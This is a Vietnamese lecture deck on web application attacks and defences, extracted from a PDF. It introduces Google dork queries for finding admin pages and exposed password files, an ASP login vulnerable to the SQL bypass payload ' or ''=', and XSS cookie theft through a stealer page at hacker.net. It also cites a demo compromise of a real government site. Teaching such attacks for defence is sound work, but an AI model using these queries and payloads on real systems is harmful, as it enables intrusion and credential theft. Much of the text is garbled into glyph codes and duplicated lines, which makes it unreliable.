Bài giảng Web application attack & defense - Võ Đỗ Thắng

(cid:87)(cid:101)(cid:98) (cid:87)(cid:101)(cid:98) (cid:65)(cid:112)(cid:112)(cid:108)(cid:105)(cid:99)(cid:97)(cid:116)(cid:105)(cid:111)(cid:110) (cid:65)(cid:112)(cid:112)(cid:108)(cid:105)(cid:99)(cid:97)(cid:116)(cid:105)(cid:111)(cid:110) (cid:65)(cid:116)(cid:116)(cid:97)(cid:99)(cid:107)(cid:32)(cid:38) (cid:65)(cid:116)(cid:116)(cid:97)(cid:99)(cid:107)(cid:32)(cid:38) (cid:68)(cid:101)(cid:102)(cid:101)(cid:110)(cid:115)(cid:101) (cid:68)(cid:101)(cid:102)(cid:101)(cid:110)(cid:115)(cid:101)

(cid:84)(cid:114)(cid:236)(cid:110)(cid:104)(cid:32)(cid:98)(cid:224)(cid:121)(cid:32)(cid:58)(cid:32)(cid:86)(cid:245)(cid:32)(cid:272)ỗ (cid:84)(cid:104)ắ(cid:110)(cid:103) (cid:84)(cid:114)(cid:236)(cid:110)(cid:104)(cid:32)(cid:98)(cid:224)(cid:121)(cid:32)(cid:58)(cid:32)(cid:86)(cid:245)(cid:32)(cid:272)ỗ (cid:84)(cid:104)ắ(cid:110)(cid:103) (cid:71)(cid:105)(cid:225)(cid:109)(cid:32)(cid:273)ố(cid:99)(cid:32)(cid:84)(cid:114)(cid:117)(cid:110)(cid:103)(cid:32)(cid:116)(cid:226)(cid:109)(cid:32)(cid:97)(cid:110)(cid:32)(cid:110)(cid:105)(cid:110)(cid:104)(cid:32)(cid:109)ạ(cid:110)(cid:103) (cid:71)(cid:105)(cid:225)(cid:109)(cid:32)(cid:273)ố(cid:99)(cid:32)(cid:84)(cid:114)(cid:117)(cid:110)(cid:103)(cid:32)(cid:116)(cid:226)(cid:109)(cid:32)(cid:97)(cid:110)(cid:32)(cid:110)(cid:105)(cid:110)(cid:104)(cid:32)(cid:109)ạ(cid:110)(cid:103) (cid:65)(cid:116)(cid:104)(cid:101)(cid:110)(cid:97)(cid:46) (cid:65)(cid:116)(cid:104)(cid:101)(cid:110)(cid:97)(cid:46)

A. Web app, Webserver: Các khái A. Web app, Webserver: Các khái

niệm và mô hình niệm và mô hình

B. Giới thiệu một số phương pháp B. Giới thiệu một số phương pháp attack cơ bản nhắm vào web attack cơ bản nhắm vào web app/webserver app/webserver

C. Phát hiện và phòng chống C. Phát hiện và phòng chống

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

(cid:65)(cid:46) (cid:87)(cid:101)(cid:98)(cid:32)(cid:97)(cid:112)(cid:112)(cid:44) (cid:87)(cid:101)(cid:98)(cid:115)(cid:101)(cid:114)(cid:118)(cid:101)(cid:114)(cid:58) (cid:67)(cid:225)(cid:99) (cid:107)(cid:104)(cid:225)(cid:105) (cid:110)(cid:105)ệ(cid:109) (cid:118)(cid:224) (cid:109)(cid:244) (cid:104)(cid:236)(cid:110)(cid:104)

(cid:61604)Web application là gì? (cid:61604)Web application là gì?

(cid:61604)Web app hay web service là một phần (cid:61604)Web app hay web service là một phần mềm ứng dụng chạy phía server (thuộc mềm ứng dụng chạy phía server (thuộc layer 7 trong mô hình OSI) layer 7 trong mô hình OSI)

(cid:61604)User có thể truy xuất web app bằng các (cid:61604)User có thể truy xuất web app bằng các trình duyệt (web browser, telnet) hay trình duyệt (web browser, telnet) hay bằng các giao thức HTTP(s) bằng các giao thức HTTP(s)

2001(c)WhiteHat Security, Inc.

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

khái niệm khái niệm

A. Web app, Webserver: Các A. Web app, Webserver: Các

và mô hình và mô hình

• Một số trình duyệt thông dụng: • Một số trình duyệt thông dụng:

IE (internet explorer) IE (internet explorer) FF( Mozilla Firefox) FF( Mozilla Firefox) Opera Opera

• Một số webserver thông dụng • Một số webserver thông dụng IIS : www.microsoft.com IIS : www.microsoft.com Apache : www.apache.org Apache : www.apache.org Jrun : www.marcomedia.com Jrun : www.marcomedia.com Tomcat jakarta.apache.org Tomcat jakarta.apache.org Iplanet webserver Iplanet webserver Cold Fusion Webserver Cold Fusion Webserver

2001(c)WhiteHat Security, Inc.

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

Mô hình chuẩn Web App

Firewall

SQL Databas e

HTTP request (cleartext or SSL)

DB

Web app

Web app

Web Web Client Client

Web Web Server Server

DB

Web app

•Apache •IIS •Netscape etc…

Plugins: •Perl •C/C++ •JSP, etc

HTTP reply (HTML, Javascript, VBscript, etc)

Database connection: •ADO, •ODBC, etc.

Web app

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

(cid:70)(cid:73)(cid:82)(cid:69)(cid:87)(cid:65)(cid:76)(cid:76)

2001(c)WhiteHat Security, Inc.

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

(cid:83)(cid:83)(cid:76)

2001(c)WhiteHat Security, Inc.

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

2001(c)WhiteHat Security, Inc.

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

B. Giới thiệu một số phương pháp attack cơ bản

nhắm vào web app/webserver

1. Google attack 1. Google attack 2. SQL injection 2. SQL injection 3. Cross site scripting 3. Cross site scripting 4. Hidden form vulnerability 4. Hidden form vulnerability 5. Cookies injection 5. Cookies injection 6. Flood database/Flood form 6. Flood database/Flood form 7. Local Attack 7. Local Attack 8. Path disclosure/Parsing exploit 8. Path disclosure/Parsing exploit 9. Dictionary Traversal 9. Dictionary Traversal 10. Remote include file 10. Remote include file 11. Secured webserver 11. Secured webserver

2001(c)WhiteHat Security, Inc.

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

Demo:

Website viện kinh tế thành phố Hồ Chí Minh bị tấn công, chiếm quyền kiểm soát

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

Google Attack Google Attack

(cid:61553) Sử dụng google để hack là một trong (cid:61553) Sử dụng google để hack là một trong những phương pháp phổ biến của hacker những phương pháp phổ biến của hacker nhằm tìm được những thông tin nhạy nhằm tìm được những thông tin nhạy cảm từ victim cảm từ victim

(cid:61553) Phương pháp Google attack giúp cho (cid:61553) Phương pháp Google attack giúp cho hacker có thể tìm ra thông tin những hacker có thể tìm ra thông tin những victim đã định trước (mục tiêu đã xác victim đã định trước (mục tiêu đã xác định) hay hack hàng lọat những victim có định) hay hack hàng lọat những victim có lỗi tương tự (mục tiêu chưa xác định) lỗi tương tự (mục tiêu chưa xác định)

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

Google attack (cont) Google attack (cont) Một số keyword hay được sử dụng: Một số keyword hay được sử dụng: 1. Directory listing: 1. Directory listing:

Intitle:index.of/admin Intitle:index.of/admin

2. CGI scanning: 2. CGI scanning:

inurl:/iisadmpwd/ inurl:/iisadmpwd/ inurl://iisadmpwd/achg.htr inurl://iisadmpwd/achg.htr inurl://iisadmpwd/aexp.htr inurl://iisadmpwd/aexp.htr inurl://iisadmpwd/aexp2.htr inurl://iisadmpwd/aexp2.htr inurl://iisadmpwd/aexp2b.htr inurl://iisadmpwd/aexp2b.htr

3. Port Scanning: 3. Port Scanning:

"VNC Desktop" inurl:5800 "VNC Desktop" inurl:5800 Inurl:webmin inurl:10000 Inurl:webmin inurl:10000

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

Google attack (cont) Google attack (cont)

Tìm link login: Tìm link login: Inurl:/admin/login.asp Inurl:/admin/login.asp Inurl:/administrator/login.asp Inurl:/administrator/login.asp Inurl:/admin/admin_login.asp Inurl:/admin/admin_login.asp … … Tìm thông tin chứa user/password: Tìm thông tin chứa user/password: "Index of" htpasswd / passwd "Index of" htpasswd / passwd filetype:xls username password email filetype:xls username password email "WS_FTP.LOG" "WS_FTP.LOG" "config.php" "config.php" allinurl: admin mdb allinurl: admin mdb service filetype:pwd (FrontPage) service filetype:pwd (FrontPage) Inurl:/admin.mdb Inurl:/admin.mdb Filetype:mdb user password Filetype:mdb user password

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

injection SQLSQL injection (cid:61656) Lỗi này thường xảy ra trên các ứng dụng (cid:61656) Lỗi này thường xảy ra trên các ứng dụng web có csdl được quản lý bằng các hệ cơ web có csdl được quản lý bằng các hệ cơ sở dữ liệu như SQL Server, Mysql, sở dữ liệu như SQL Server, Mysql, Oracle, DB2, Sysbase, MsAccess… Oracle, DB2, Sysbase, MsAccess…

(cid:61656) Mỗi hệ quản trị csdl có một số điểm (cid:61656) Mỗi hệ quản trị csdl có một số điểm giống và khác nhau giữa các phương giống và khác nhau giữa các phương pháp injection pháp injection

2001(c)WhiteHat Security, Inc.

(cid:61656) Trong bài báo cáo này xin trình bày (cid:61656) Trong bài báo cáo này xin trình bày phương pháp injection trong hệ quản trị phương pháp injection trong hệ quản trị csdl phổ biến nhất thế giới: MSSQL csdl phổ biến nhất thế giới: MSSQL

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

Các dạng tấn công SQL injection Các dạng tấn công SQL injection

(cid:61604) SQL bypass: (cid:61604) SQL bypass: (cid:61604) Login.htm (cid:61604) Login.htm (cid:61604)

(cid:61604) (cid:61604) Username:
name="fUSRNAME">

(cid:61604) Password:

name="fPASSWORD">
name="fPASSWORD">

(cid:61604) (cid:61604) (cid:61604)

(cid:61604)

2001(c)WhiteHat Security, Inc.

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

SQL Bypass SQL Bypass

2001(c)WhiteHat Security, Inc.

(cid:61604) execlogin.asp (cid:61604) execlogin.asp (cid:61604) <% (cid:61604) <% (cid:61604) Dim vUsrName, vPassword, objRS, strSQL (cid:61604) Dim vUsrName, vPassword, objRS, strSQL (cid:61604) vUsrName = Request.Form("fUSRNAME") (cid:61604) vUsrName = Request.Form("fUSRNAME") (cid:61604) vPassword = Request.Form("fPASSWORD") (cid:61604) vPassword = Request.Form("fPASSWORD") (cid:61604) strSQL = "SELECT * FROM T_USERS " & _ (cid:61604) strSQL = "SELECT * FROM T_USERS " & _ (cid:61604) "WHERE USR_NAME=' " & vUsrName & _ (cid:61604) "WHERE USR_NAME=' " & vUsrName & _ (cid:61604) " ' and USR_PASSWORD=' " & vPassword & " ' " (cid:61604) " ' and USR_PASSWORD=' " & vPassword & " ' " (cid:61604) Set objRS = Server.CreateObject("ADODB.Recordset") (cid:61604) Set objRS = Server.CreateObject("ADODB.Recordset") (cid:61604) objRS.Open strSQL, "DSN=..." (cid:61604) objRS.Open strSQL, "DSN=..." (cid:61604) If (objRS.EOF) Then (cid:61604) If (objRS.EOF) Then (cid:61604) Response.Write "Invalid login." (cid:61604) Response.Write "Invalid login." (cid:61604) Else (cid:61604) Else (cid:61604) Response.Write "You are logged in as " & objRS("USR_NAME") (cid:61604) Response.Write "You are logged in as " & objRS("USR_NAME") (cid:61604) End If (cid:61604) End If (cid:61604) Set objRS = Nothing (cid:61604) Set objRS = Nothing (cid:61604) %> (cid:61604) %>

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

SQL bypass SQL bypass

(cid:61474)- Khi hacker nhập vào: (cid:61474)- Khi hacker nhập vào:

‘ or ‘’=‘ ‘ or ‘’=‘ (cid:61474) Câu truy vấn sẽ trở thành (cid:61474) Câu truy vấn sẽ trở thành (cid:61474) SELECT * FROM T_USERS WHERE USR_NAME ='' (cid:61474) SELECT * FROM T_USERS WHERE USR_NAME =''

OR ''='' and USR_PASSWORD= '' OR ''='‘ OR ''='' and USR_PASSWORD= '' OR ''='‘

(cid:61474)- Câu truy vấn (cid:61474)- Câu truy vấn

(cid:61474) Câu truy vấn này là hợp lệ và sẽ trả về tất cả các bản ghi của (cid:61474) Câu truy vấn này là hợp lệ và sẽ trả về tất cả các bản ghi của

T_USERS và đoạn mã tiếp theo xử lí T_USERS và đoạn mã tiếp theo xử lí

(cid:61474) Người dùng đăng nhập bất hợp pháp này như là người dùng (cid:61474) Người dùng đăng nhập bất hợp pháp này như là người dùng

đăng nhập hợp lệ. đăng nhập hợp lệ.

(cid:61474) Tuy nhiên thực tế từng trường hợp cụ thể sẽ có các cách (cid:61474) Tuy nhiên thực tế từng trường hợp cụ thể sẽ có các cách

bypass khác nhau, ko có công thức chung. bypass khác nhau, ko có công thức chung.

(cid:61474) (Xem video demo SQL bypass vienkinhte.gov.vn) (cid:61474) (Xem video demo SQL bypass vienkinhte.gov.vn)

2001(c)WhiteHat Security, Inc.

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

SQL injection (cont) SQL injection (cont)

thiệu về kĩ thuật runtime patching thiệu về kĩ thuật runtime patching

(cid:61474)Ngoài ra còn một số kĩ thuật nâng cao khác sử dụng (cid:61474)Ngoài ra còn một số kĩ thuật nâng cao khác sử dụng SQL injection như: SQL injection như: (cid:61474) Union/Convert magic (khai thác dữ liệu) (cid:61474) Union/Convert magic (khai thác dữ liệu) (cid:61474)- Blind SQL injection (cid:61474)- Blind SQL injection (cid:61474)- Tạo script Ddos sever (cid:61474)- Tạo script Ddos sever (cid:61474)- Sử dụng openrowset (cid:61474)- Sử dụng openrowset (cid:61474)- Store procedure injection, kĩ thuật nâng quyền (cid:61474)- Store procedure injection, kĩ thuật nâng quyền user,giới user,giới (cid:61474)- Upload backdoor (cid:61474)- Upload backdoor (cid:61590)(phần này khá dài,demo hòan tòan bằng Video) (cid:61590)(phần này khá dài,demo hòan tòan bằng Video) (cid:61590)(xem video sql_ij_basic, sql_ij_admin) (cid:61590)(xem video sql_ij_basic, sql_ij_admin)

2001(c)WhiteHat Security, Inc.

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

site scripting CrossCross site scripting

Cross site scripting là gì? Cross site scripting là gì? - Cross site scripting viết tắt là XSS (để tránh nhầm - Cross site scripting viết tắt là XSS (để tránh nhầm lẫn với CSS) là một dạng tấn công hướng về phía lẫn với CSS) là một dạng tấn công hướng về phía User (Client) mà ko tác động trực tiếp đến User (Client) mà ko tác động trực tiếp đến webserver webserver

- Hacker thường lợi dụng XSS để đánh cắp cookie - Hacker thường lợi dụng XSS để đánh cắp cookie

của user, phising etc… của user, phising etc…

- Tuy nhiên vẫn có trường hợp ngọai lệ Hacker vẫn - Tuy nhiên vẫn có trường hợp ngọai lệ Hacker vẫn

có thể xử dụng XSS để get root server (xem có thể xử dụng XSS để get root server (xem Iplanet server attack) Iplanet server attack)

2001(c)WhiteHat Security, Inc.

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

Cross site scripting Cross site scripting

- Phương pháp test: - Phương pháp test: + inject đọan script + inject đọan script + vào bất cứ + vào bất cứ input data (Url, input data (Url,

đâu cho phép user đâu cho phép user Feedback, Form, Search, cookie…etc) Feedback, Form, Search, cookie…etc) + Nếu thấy xuất hiện ra một pop-up ‘test’ + Nếu thấy xuất hiện ra một pop-up ‘test’ thì có nghĩa là website đã bị dính XSS thì có nghĩa là website đã bị dính XSS + Đọan code trên không phải là cách test + Đọan code trên không phải là cách test chung, nhiều trường hợp phải view chung, nhiều trường hợp phải view source hoặc mã hóa để vượt qua filter. source hoặc mã hóa để vượt qua filter.

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

Cross site scripting Cross site scripting

- Phương pháp tấn công: - Phương pháp tấn công: + Attacker viết một đọan mã để get cookie của + Attacker viết một đọan mã để get cookie của

victim như sau: victim như sau: ?>

2001(c)WhiteHat Security, Inc.

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

Cross site scripting Cross site scripting

(cid:45) (cid:83)(cid:97)(cid:117) (cid:273)(cid:243) (cid:117)(cid:112) (cid:108)(cid:234)(cid:110) (cid:49) (cid:104)(cid:111)(cid:115)(cid:116)(cid:105)(cid:110)(cid:103) (cid:99)ủ(cid:97) (cid:104)(cid:97)(cid:99)(cid:107)(cid:101)(cid:114) (cid:45) (cid:83)(cid:97)(cid:117) (cid:273)(cid:243) (cid:117)(cid:112) (cid:108)(cid:234)(cid:110) (cid:49) (cid:104)(cid:111)(cid:115)(cid:116)(cid:105)(cid:110)(cid:103) (cid:99)ủ(cid:97) (cid:104)(cid:97)(cid:99)(cid:107)(cid:101)(cid:114) (cid:43) (cid:86)(cid:100)(cid:58)(cid:104)(cid:116)(cid:116)(cid:112)(cid:58)(cid:47)(cid:47)(cid:104)(cid:97)(cid:99)(cid:107)(cid:101)(cid:114)(cid:46)(cid:110)(cid:101)(cid:116)(cid:47)(cid:115)(cid:116)(cid:101)(cid:97)(cid:108)(cid:101)(cid:114)(cid:46)(cid:112)(cid:104)(cid:112) (cid:43) (cid:86)(cid:100)(cid:58)(cid:104)(cid:116)(cid:116)(cid:112)(cid:58)(cid:47)(cid:47)(cid:104)(cid:97)(cid:99)(cid:107)(cid:101)(cid:114)(cid:46)(cid:110)(cid:101)(cid:116)(cid:47)(cid:115)(cid:116)(cid:101)(cid:97)(cid:108)(cid:101)(cid:114)(cid:46)(cid:112)(cid:104)(cid:112) (cid:45) (cid:75)ế (cid:116)(cid:105)ế(cid:112) (cid:104)(cid:97)(cid:99)(cid:107)(cid:101)(cid:114) (cid:115)ẽ (cid:112)(cid:111)(cid:115)(cid:116) (cid:273)ọ(cid:97)(cid:110) (cid:99)(cid:111)(cid:100)(cid:101) (cid:115)(cid:97)(cid:117) (cid:118)(cid:224)(cid:111) (cid:102)(cid:111)(cid:114)(cid:117)(cid:109) (cid:40)(cid:111)(cid:114) (cid:85)(cid:82)(cid:76) (cid:41) (cid:45) (cid:75)ế (cid:116)(cid:105)ế(cid:112) (cid:104)(cid:97)(cid:99)(cid:107)(cid:101)(cid:114) (cid:115)ẽ (cid:112)(cid:111)(cid:115)(cid:116) (cid:273)ọ(cid:97)(cid:110) (cid:99)(cid:111)(cid:100)(cid:101) (cid:115)(cid:97)(cid:117) (cid:118)(cid:224)(cid:111) (cid:102)(cid:111)(cid:114)(cid:117)(cid:109) (cid:40)(cid:111)(cid:114) (cid:85)(cid:82)(cid:76) (cid:41)

(cid:99)ủ(cid:97) (cid:49) (cid:119)(cid:101)(cid:98)(cid:115)(cid:105)(cid:116)(cid:101) (cid:118)ớ(cid:105) (cid:104)(cid:236)(cid:110)(cid:104) (cid:116)(cid:104)ứ(cid:99) (cid:110)(cid:104)ư (cid:115)(cid:97)(cid:117) (cid:99)ủ(cid:97) (cid:49) (cid:119)(cid:101)(cid:98)(cid:115)(cid:105)(cid:116)(cid:101) (cid:118)ớ(cid:105) (cid:104)(cid:236)(cid:110)(cid:104) (cid:116)(cid:104)ứ(cid:99) (cid:110)(cid:104)ư (cid:115)(cid:97)(cid:117)

(cid:43)

(cid:45) (cid:83)(cid:97)(cid:117) (cid:273)(cid:243) (cid:98)ằ(cid:110)(cid:103) (cid:118)(cid:224)(cid:105) (cid:112)(cid:104)ươ(cid:110)(cid:103) (cid:112)(cid:104)(cid:225)(cid:112) (cid:112)(cid:104)(cid:105)(cid:115)(cid:105)(cid:110)(cid:103)(cid:44) (cid:115)(cid:97)(cid:117) (cid:107)(cid:104)(cid:105) (cid:118)(cid:105)(cid:99)(cid:116)(cid:105)(cid:109) (cid:273)(cid:227) (cid:45) (cid:83)(cid:97)(cid:117) (cid:273)(cid:243) (cid:98)ằ(cid:110)(cid:103) (cid:118)(cid:224)(cid:105) (cid:112)(cid:104)ươ(cid:110)(cid:103) (cid:112)(cid:104)(cid:225)(cid:112) (cid:112)(cid:104)(cid:105)(cid:115)(cid:105)(cid:110)(cid:103)(cid:44) (cid:115)(cid:97)(cid:117) (cid:107)(cid:104)(cid:105) (cid:118)(cid:105)(cid:99)(cid:116)(cid:105)(cid:109) (cid:273)(cid:227) (cid:273)(cid:259)(cid:110)(cid:103) (cid:110)(cid:104)ậ(cid:112) (cid:118)(cid:224) (cid:273)ọ(cid:99) (cid:98)(cid:224)(cid:105) (cid:118)(cid:105)ế(cid:116) (cid:40)(cid:104)(cid:111)ặ(cid:99) (cid:99)(cid:108)(cid:105)(cid:99)(cid:107) (cid:118)(cid:224)(cid:111) (cid:85)(cid:82)(cid:76)(cid:41) (cid:99)ủ(cid:97) (cid:104)(cid:97)(cid:99)(cid:107)(cid:101)(cid:114) (cid:273)(cid:227) (cid:273)(cid:259)(cid:110)(cid:103) (cid:110)(cid:104)ậ(cid:112) (cid:118)(cid:224) (cid:273)ọ(cid:99) (cid:98)(cid:224)(cid:105) (cid:118)(cid:105)ế(cid:116) (cid:40)(cid:104)(cid:111)ặ(cid:99) (cid:99)(cid:108)(cid:105)(cid:99)(cid:107) (cid:118)(cid:224)(cid:111) (cid:85)(cid:82)(cid:76)(cid:41) (cid:99)ủ(cid:97) (cid:104)(cid:97)(cid:99)(cid:107)(cid:101)(cid:114) (cid:273)(cid:227) (cid:103)ử(cid:105)(cid:44) (cid:108)ậ(cid:112) (cid:116)ứ(cid:99) (cid:99)(cid:111)(cid:111)(cid:107)(cid:105)(cid:101) (cid:99)ủ(cid:97) (cid:118)(cid:105)(cid:99)(cid:116)(cid:105)(cid:109) (cid:273)(cid:227) (cid:273)(cid:99) (cid:103)(cid:104)(cid:105) (cid:118)(cid:224)(cid:111) (cid:102)(cid:105)(cid:108)(cid:101) (cid:99)(cid:111)(cid:111)(cid:107)(cid:105)(cid:101)(cid:49)(cid:49)(cid:46)(cid:116)(cid:120)(cid:116) (cid:103)ử(cid:105)(cid:44) (cid:108)ậ(cid:112) (cid:116)ứ(cid:99) (cid:99)(cid:111)(cid:111)(cid:107)(cid:105)(cid:101) (cid:99)ủ(cid:97) (cid:118)(cid:105)(cid:99)(cid:116)(cid:105)(cid:109) (cid:273)(cid:227) (cid:273)(cid:99) (cid:103)(cid:104)(cid:105) (cid:118)(cid:224)(cid:111) (cid:102)(cid:105)(cid:108)(cid:101) (cid:99)(cid:111)(cid:111)(cid:107)(cid:105)(cid:101)(cid:49)(cid:49)(cid:46)(cid:116)(cid:120)(cid:116) (cid:99)ủ(cid:97) (cid:104)(cid:97)(cid:99)(cid:107)(cid:101)(cid:114)(cid:46)(cid:67)(cid:244)(cid:110)(cid:103) (cid:118)(cid:105)ệ(cid:99) (cid:99)(cid:242)(cid:110) (cid:108)ạ(cid:105) (cid:99)ủ(cid:97) (cid:72)(cid:97)(cid:99)(cid:107)(cid:101)(cid:114) (cid:107)(cid:104)(cid:225) (cid:273)ơ(cid:110) (cid:103)(cid:105)ả(cid:110)(cid:58)(cid:102)(cid:97)(cid:107)(cid:101) (cid:99)ủ(cid:97) (cid:104)(cid:97)(cid:99)(cid:107)(cid:101)(cid:114)(cid:46)(cid:67)(cid:244)(cid:110)(cid:103) (cid:118)(cid:105)ệ(cid:99) (cid:99)(cid:242)(cid:110) (cid:108)ạ(cid:105) (cid:99)ủ(cid:97) (cid:72)(cid:97)(cid:99)(cid:107)(cid:101)(cid:114) (cid:107)(cid:104)(cid:225) (cid:273)ơ(cid:110) (cid:103)(cid:105)ả(cid:110)(cid:58)(cid:102)(cid:97)(cid:107)(cid:101) (cid:99)(cid:111)(cid:111)(cid:107)(cid:105)(cid:101) (cid:118)(cid:224) (cid:116)(cid:114)(cid:117)(cid:121) (cid:120)(cid:117)ấ(cid:116) (cid:116)(cid:224)(cid:105) (cid:110)(cid:103)(cid:117)(cid:121)(cid:234)(cid:110) (cid:99)ủ(cid:97) (cid:119)(cid:101)(cid:98)(cid:115)(cid:105)(cid:116)(cid:101) (cid:118)ớ(cid:105) (cid:113)(cid:117)(cid:121)ề(cid:110) (cid:99)ủ(cid:97) (cid:117)(cid:115)(cid:101)(cid:114) (cid:99)(cid:111)(cid:111)(cid:107)(cid:105)(cid:101) (cid:118)(cid:224) (cid:116)(cid:114)(cid:117)(cid:121) (cid:120)(cid:117)ấ(cid:116) (cid:116)(cid:224)(cid:105) (cid:110)(cid:103)(cid:117)(cid:121)(cid:234)(cid:110) (cid:99)ủ(cid:97) (cid:119)(cid:101)(cid:98)(cid:115)(cid:105)(cid:116)(cid:101) (cid:118)ớ(cid:105) (cid:113)(cid:117)(cid:121)ề(cid:110) (cid:99)ủ(cid:97) (cid:117)(cid:115)(cid:101)(cid:114) (cid:118)ừ(cid:97) (cid:99)(cid:104)(cid:105)ế(cid:109) (cid:273)ượ(cid:99) (cid:118)ừ(cid:97) (cid:99)(cid:104)(cid:105)ế(cid:109) (cid:273)ượ(cid:99)

2001(c)WhiteHat Security, Inc.

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

form vulnerability Hidden form vulnerability Hidden

Hidden form vulnerability là gì? Hidden form vulnerability là gì? - Là một dạng truyền biến của webapplication, coder - Là một dạng truyền biến của webapplication, coder không muốn cho user can thiệp trong quá trình không muốn cho user can thiệp trong quá trình truyền biến truyền biến

- Hidden form có dạng: - Hidden form có dạng:

type="hidden" type="hidden"

name="jac_minReqUnits"> name="jac_minReqUnits">

value="13.95" value="13.95" type="hidden" type="hidden"

name="jac_minReqWeight">

2001(c)WhiteHat Security, Inc.

- Vậy điều gì xảy ra nếu như các biến trong hidden - Vậy điều gì xảy ra nếu như các biến trong hidden form không được check một cách chặt chẽ khi user form không được check một cách chặt chẽ khi user submit? Hacker sẽ lợi dụng điều này như thế nào?!? submit? Hacker sẽ lợi dụng điều này như thế nào?!? (xem video hiden_form_demo) (xem video hiden_form_demo)

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

injection Cookies injection Cookies

(cid:67)(cid:111)(cid:111)(cid:107)(cid:105)(cid:101) (cid:108)(cid:224) (cid:103)(cid:236)(cid:63) (cid:67)(cid:111)(cid:111)(cid:107)(cid:105)(cid:101) (cid:108)(cid:224) (cid:103)(cid:236)(cid:63) - Cookie là những phần dữ liệu nhỏ có cấu trúc được chia sẻ - Cookie là những phần dữ liệu nhỏ có cấu trúc được chia sẻ giữa web site và browser của người dùng. cookies được lưu trữ giữa web site và browser của người dùng. cookies được lưu trữ dưới những file dữ liệu nhỏ dạng text (size dưới 4k). Chúng dưới những file dữ liệu nhỏ dạng text (size dưới 4k). Chúng được các site tạo ra để lưu trữ/truy tìm/nhận biết các thông tin được các site tạo ra để lưu trữ/truy tìm/nhận biết các thông tin về người dùng đã ghé thăm site và những vùng mà họ đi qua về người dùng đã ghé thăm site và những vùng mà họ đi qua trong site. trong site.

- Những thông tin này có thể bao gồm tên/định danh người - Những thông tin này có thể bao gồm tên/định danh người dùng, mật khẩu, sở thích, thói quen…Trong một số trường dùng, mật khẩu, sở thích, thói quen…Trong một số trường hợp, cookie có thể hiểu là 1 token để Authentication (cid:110)(cid:103)ườ(cid:105) hợp, cookie có thể hiểu là 1 token để Authentication (cid:110)(cid:103)ườ(cid:105) (cid:100)(cid:249)(cid:110)(cid:103)(cid:46) (cid:100)(cid:249)(cid:110)(cid:103)(cid:46)

2001(c)WhiteHat Security, Inc.

(cid:45) (cid:78)(cid:103)(cid:242)(cid:97)(cid:105) (cid:99)(cid:225)(cid:99)(cid:104) (cid:116)ấ(cid:110) (cid:99)(cid:244)(cid:110)(cid:103) (cid:98)ằ(cid:110)(cid:103) (cid:88)(cid:83)(cid:83) (cid:273)ể (cid:108)ấ(cid:121) (cid:99)(cid:111)(cid:111)(cid:107)(cid:105)(cid:101) (cid:99)ủ(cid:97) (cid:118)(cid:105)(cid:99)(cid:116)(cid:105)(cid:109)(cid:44) (cid:45) (cid:78)(cid:103)(cid:242)(cid:97)(cid:105) (cid:99)(cid:225)(cid:99)(cid:104) (cid:116)ấ(cid:110) (cid:99)(cid:244)(cid:110)(cid:103) (cid:98)ằ(cid:110)(cid:103) (cid:88)(cid:83)(cid:83) (cid:273)ể (cid:108)ấ(cid:121) (cid:99)(cid:111)(cid:111)(cid:107)(cid:105)(cid:101) (cid:99)ủ(cid:97) (cid:118)(cid:105)(cid:99)(cid:116)(cid:105)(cid:109)(cid:44) (cid:72)(cid:97)(cid:99)(cid:107)(cid:101)(cid:114) (cid:99)(cid:242)(cid:110) (cid:99)(cid:243) (cid:116)(cid:104)ể (cid:100)(cid:249)(cid:110)(cid:103) (cid:109)ộ(cid:116) (cid:107)(cid:297) (cid:116)(cid:104)(cid:117)ậ(cid:116) (cid:103)ọ(cid:105) (cid:108)(cid:224) (cid:8220)(cid:99)(cid:111)(cid:111)(cid:107)(cid:105)(cid:101) (cid:72)(cid:97)(cid:99)(cid:107)(cid:101)(cid:114) (cid:99)(cid:242)(cid:110) (cid:99)(cid:243) (cid:116)(cid:104)ể (cid:100)(cid:249)(cid:110)(cid:103) (cid:109)ộ(cid:116) (cid:107)(cid:297) (cid:116)(cid:104)(cid:117)ậ(cid:116) (cid:103)ọ(cid:105) (cid:108)(cid:224) (cid:8220)(cid:99)(cid:111)(cid:111)(cid:107)(cid:105)(cid:101) (cid:105)(cid:110)(cid:106)(cid:101)(cid:99)(cid:116)(cid:105)(cid:111)(cid:110)(cid:8221) (cid:273)ể (cid:99)(cid:104)(cid:105)ế(cid:109) (cid:108)ấ(cid:121) (cid:112)(cid:104)(cid:105)(cid:234)(cid:110) (cid:108)(cid:224)(cid:109) (cid:118)(cid:105)ệ(cid:99) (cid:99)ủ(cid:97) (cid:118)(cid:105)(cid:99)(cid:116)(cid:105)(cid:109) (cid:110)ế(cid:117) (cid:110)(cid:104)ư (cid:105)(cid:110)(cid:106)(cid:101)(cid:99)(cid:116)(cid:105)(cid:111)(cid:110)(cid:8221) (cid:273)ể (cid:99)(cid:104)(cid:105)ế(cid:109) (cid:108)ấ(cid:121) (cid:112)(cid:104)(cid:105)(cid:234)(cid:110) (cid:108)(cid:224)(cid:109) (cid:118)(cid:105)ệ(cid:99) (cid:99)ủ(cid:97) 